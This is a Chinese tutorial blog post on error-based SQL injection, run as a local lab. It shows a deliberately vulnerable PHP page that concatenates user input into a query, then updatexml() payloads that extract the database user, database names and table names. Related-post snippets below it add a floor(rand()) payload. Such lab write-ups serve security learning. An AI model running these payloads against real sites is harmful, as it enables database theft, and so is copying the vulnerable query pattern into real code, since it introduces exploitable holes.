SQL注入之报错注入攻击

最新推荐文章于 2024-08-12 15:40:55 发布
最新推荐文章于 2024-08-12 15:40:55 发布
阅读量933 收藏 2
点赞数
分类专栏: 渗透测试
原文链接:https://www.ms08067.com/
版权

目录

1 环境介绍

2 实验过程

本文采用的是《Web安全攻防渗透测试实战指南》提供的代码及数据库。

1 环境介绍

在报销注入页面中,程序获取GET参数username后,将username拼接到SQL语句中,然后到数据库查询。如果执行成功,就输出ok;如果出错,则通过echo mysqli_ error($con),将错误信息输出到页面(mysqli_error返回上一个MySQL函数的错误),代码如下所示。

error.php

<?php
$con=mysqli_connect("localhost","root","qwer","security");
// 检测连接
if (mysqli_connect_errno())
{
	echo "连接失败: " . mysqli_connect_error();
}

$username = $_GET['username'];

if($result = mysqli_query($con,"select * from users where `username`='".$username."'")){
	echo "ok";
}else{
	echo mysqli_error($con);
}

?>

输入username=1'时,SQL语句为select*from users where 'username'='1"。执行时,会因为多了一个单引号而报错。利用这种错误回
显,我们可以通过floor ()、updatexml ()等函数将要查询的内容输出到页面上。

测试数据库

2 实验过程

首先访问http://127.0.0.1/four/4.1.8/error.php?username=1',因为参数username的值是1',在数据库中执行SQL时,会因为多了一个单引号而报错,输出到页面的结果如图所示。

通过页面返回结果可以看出,程序直接将错误信息输出到了页面上,所以此处可以利用报错注入获取数据。报错注入有多种格式,此处利用函数updatexml()演示SQL语句获取user()的值,SQL语句如下所示。

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

其中0x7e是ASCI编码,解码结果为~,如图所示。

然后尝试获取当前数据库的库名

' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

接着可以利用select语句继续获取数据库中的库名、表名和字段名,查询语句与Union注入的相同。因为报错注入只显示条结果,所以需要使用limit语句。构造的语句如下所示。

' and updatexml (1, concat(0x7e,(select schema_name from information_schema.schemata limit 0, 1),0x7e), 1)--+



结果如图所示,可以获取数据库的库名。

如图所示,构造查询表名的语句,如下所示,可以获取数据库security的表名。

http://127.0.0.1/four/4.1.8/error.php?username=1%27%20and%20updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),0x7e),1)--+


 

Masked5
关注
专栏目录
《网络安全自学教程》- SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 5125
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
SQL注入报错注入
qq_45557130的博客
10-07 569
sql注入报错注入
SQL注入报错注入
帅醉了的博客
03-03 1236
0x00_报错注入原理 构造报错payload让信息通过报错信息回显出来。在查询不回现内容,会答应错误信息。Update、insert等语句,会打印错误信息。 0x01_报错注入操作 floor()报错注入 mysql模板: concat:连接字符串功能 floor:去整数值 rand:取0~1之间的随机浮点值 group by:根据一个或多个列对结果集进行分组并有排序功能 select coun...
SQL注入(head、报错、盲注)
最新发布
m0_74249600的博客
08-12 1620
本文讲述了head注入、报错注入以及时间盲注与布尔盲注等sql注入的基本注入类型,之后我会继续出sql注入知识点总结直至完整,请关注持续更新(本文内容来自课件,如有版权问题请与我联系)
SQL注入报错注入
4ut15m's blog
02-02 820
其他相关文章: SQL注入基础 盲注 报错注入 用于注入结果无回显但错误信息有输出的情况 floor报错注入 floor函数:返回小于等于某值的整数,例如floor(1)则返回1,floor(1.9)也返回1 rand函数:生成随机数.可指定seed,指定后每次生成的数都一样即伪随机,不指定seed则每次生成的随机数都不一样. 通过floor和rand构造payload使...
Web安全之SQL注入攻击-报错注入
hack0919的博客
05-10 380
SQL注入长期位于OWASP TOP10 榜首,对Web 安全有着很大的影响
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 953
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
Sql漏洞注入之报错注入
Matheus的博客
07-22 887
报错注入 在MYSQL中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端,从而从报错信息中获取设定的信息。select/insert/update/delete都可以使用报错来获取信息。 报错注入流程: 1)判断是否存在注入点。 2)构造错误的语法制造报错。 3)使用对应的报错函数来获取信息。 常用的报错函数: 基于函数报错的信息获取(select/insert/update/delete) updatexml() updatexml()函数是MYSQL对XML
sql注入报错注入
2301_80913334的博客
04-12 1903
掌握好extractvalue、updatexml、floor报错,floor报错较难需要多理解,updatexml较为常用报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。是一种页面响应形式。响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面报错注入存在基础:后台对于输入输出的合理性没有做检查演示:输入正常语句情况下页面。
SQL注入---报错注入
zhoutong2323的博客
04-04 1050
SQL注入报错攻击中,攻击者通过在用户输入的位置注入恶意的SQL代码,使应用程序拼接出错误的SQL语句。当数据库执行错误的SQL语句时,会返回错误信息,这些错误信息可能包含数据库的具体错误信息、相关的数据和表结构等敏感信息。攻击者通过分析这些错误信息来获取相关的数据或者进一步攻击数据库。案例分析:上述sql注入中认为将正确的sql语句database() 改为错误的sql语句 datadase()数据库回显内容为:FUNCTION security.datadase does not exist。
sql注入——报错注入
m0_73756016的博客
10-18 2221
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
SQL注入--报错注入
liukenn的博客
07-30 3306
一个带get参数的网站并且不从数据库返回数据,但存在报错信息 http://127.0.0.1/index.php?id=1 http://127.0.0.1/index.php?id=1' 查看字段情况: http://127.0.0.1/index.php?id=1' order by 3%23 http://127.0.0.1/index.php?id=1'
SQL注入攻击报错注入
qq_36242914的博客
03-29 291
SQL注入攻击报错注入 1.floor(rand(0)*2) 注入语句:select and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 报错注入原理: 报错关键点group by floor((rand(0)*2)) 1. rand(0)生成一组以0为种子产生一组固定随机数:0.15522...,0.62088..
Web安全原理剖析(四)——报错注入攻击
热门推荐
Phantom03167的博客
09-10 1万+
报错注入攻击
SQL注入之【报错注入
初学者L_言的博客
09-27 464
一、原理 1.1 使用位置 一般是在页面没有显示位、但用echo mysql_error();输出了错误信息 限制:不能用group_concat(),只能用limit依次猜解 1.2 相关函数 floor() 1、floor() floor()是取整数 rand()在0和1之间产生一个随机数 rand(0)*2将取0到2的随机数 floor(rand()*2)有两条记录就会报错 floor(rand(0)*2)记录需为3条以上,且3条以上必报错,返回的值是有规律的 count(*)是用来统计结果的,相
SQL注入之报错型注入
qq_43348375的博客
04-01 523
sql注入报错注入
sql注入的报错信息
09-11
SQL注入的报错信息通常是数据库返回的错误信息,可能包含以下内容之一: 1. "SQL syntax error" 或 "You have an error in your SQL syntax" 这种错误提示表明在SQL查询中存在语法错误,可能是因为攻击者成功注入了恶意代码或者查询语句不正确。 2. "Unknown column" 或 "Column not found" 这种错误提示表明在查询中引用了一个不存在的列名或表名。 3. "Invalid query" 或 "Invalid parameter" 这种错误提示表明查询中使用了无效的参数或数据类型,可能是因为攻击者成功注入了非法输入。 4. "Access denied" 或 "Permission denied" 这种错误提示表明当前用户没有足够的权限执行所请求的操作。 5. "Duplicate entry" 或 "Duplicate key value" 这种错误提示表明插入或更新操作中使用了重复的键值。 当开发人员正确地处理SQL查询时,不应将详细的错误信息直接返回给用户,以防止潜在的信息泄露和攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值